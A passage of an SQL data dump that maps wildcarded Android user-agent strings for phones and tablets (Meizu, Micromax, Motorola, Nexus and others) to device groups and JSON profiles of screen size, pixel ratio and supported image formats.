Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M3 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M3E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M3X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M5 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M5c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-M6 Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-MEIZU M6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-MEIZU_M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-PRO 6 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-PRO 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-U20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-m2 note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-m3 note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MZ-meizu C9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Maad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Maad+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Maya) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Metal) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q351) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q354) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q3551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q397) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q398) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q402) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q409) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q4101) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q4202) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q4251) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q4260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q427) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q479) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Micromax Q480) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_micromax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MicromaxP802) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_micromax','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Moto C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Moto G (4)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Moto G Play) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MotoE2(4G-LTE)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MotoG3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MotoG3-TE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorola','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; MyWigo City3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; N503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; N551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; N9136) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; N9519) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NCE-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NEM-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NEM-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NEM-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NEM-L51) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NEM-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NEM-UL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NET1100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NEXT G+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NOA H6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NOA LOOP) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NOA NEXT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NOA_H8se) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NOA_H9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NS5004) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NS5006) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NUU_A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX523J_V1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX529J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX531J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX541J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX549J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX551J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX569J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX573J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX575J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NX597J) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; NYX_SHADE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Neffos X1 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Neffos X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Neffos Y5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Neffos Y50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Neffos Y5L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 10) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_nexus','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 5) AppleWebKit/*(KHTML, like Gecko) Chrome Mobile Safari/*','android_nexus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Nexus 5X) AppleWebKit/* (KHTML, like Gecko) Chrome 